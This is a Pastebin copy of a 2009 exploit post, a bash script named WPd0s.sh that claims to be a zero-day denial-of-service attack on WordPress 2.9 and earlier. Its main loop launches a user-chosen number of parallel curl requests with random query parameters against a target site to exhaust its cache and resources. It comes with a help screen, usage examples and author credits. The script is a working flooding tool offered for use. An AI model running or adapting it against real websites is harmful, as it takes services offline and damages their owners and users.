liT2lemhu

WP <== 2.9 D0S 0day

Jun 24th, 2013
149
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. =========================
  2. WordPress <= 2.9 DoS 0day
  3. =========================
  4.  
  5. # Title: 0day Wordpress DOS <= 2.9
  6. # CVE-ID: ()
  7. # OSVDB-ID: ()
  8. # Author: emgent
  9. # Published: 2009-12-31
  10. # Verified: yes
  11.  
  12. view source
  13. print?
  14. #!/bin/bash
  15. #
  16. # This program is released under the terms of the GNU General Public License
  17. # (GPL), which is distributed with this software in the file "COPYING".
  18. # The GPL specifies the terms under which users may copy and use this software.
  19. #
  20. # WPd0s.sh
  21. # This is a 0day DOS issue for Wordpress Core that use cache stressing with random
  22. # parameter on multiple requests.
  23. #
  24.  
  25. show_help(){
  26. echo ""
  27. echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"
  28. echo ""
  29. echo " --usage show the exploit Usage"
  30. echo " --prereq show the exploit Prerequisites"
  31. echo " --credits show the exploit Credits"
  32. echo " --help show the Help"
  33. echo ""
  34. echo "Emanuele Gentili"
  35. }
  36.  
  37. show_credits(){
  38. echo ""
  39. echo " Emanuele 'emgent' Gentili"
  40. echo " http://www.backtrack.it/~emgent/"
  41. echo " emgent @ backtrack.it"
  42. echo ""
  43. }
  44.  
  45. show_prereq(){
  46. echo ""
  47. echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"
  48. echo ""
  49. echo " Prerequeisites:"
  50. echo " Bash (yeah because is cool.)"
  51. echo " Curl"
  52. echo ""
  53. echo " Emanuele Gentili <emgent@backtrack.it>"
  54. }
  55.  
  56. show_usage(){
  57. echo ""
  58. echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"
  59. echo ""
  60. echo " usage $0 --host http://localhost/wordpress/ --requests 1000"
  61. echo ""
  62. echo " Emanuele Gentili <emgent@backtrack.it>"
  63. }
  64.  
  65.  
  66. # Bash
  67. while [[ $# != 0 ]]; do
  68. arg_name=$1; shift
  69. case "$arg_name" in
  70. --help|-?|-h) show_help; exit 0;;
  71. --credits) show_credits; exit 0;;
  72. --usage) show_usage; exit 0;;
  73. --prereq) show_prereq; exit 0;;
  74. --host) host=$1; shift;;
  75. --requests) requests=$1; shift;;
  76. *) echo "invalid option: $1"; show_help;exit 1;;
  77. esac
  78. done
  79.  
  80. [ -z "$host" ] && { show_help; exit 1; }
  81.  
  82. for random in `seq 1 $requests`; do
  83. curl -A Firefox -o --url "$host/?cat=2&d0s=1&d0s=$random" > /dev/null 2>&1 &
  84. done
RAW Paste Data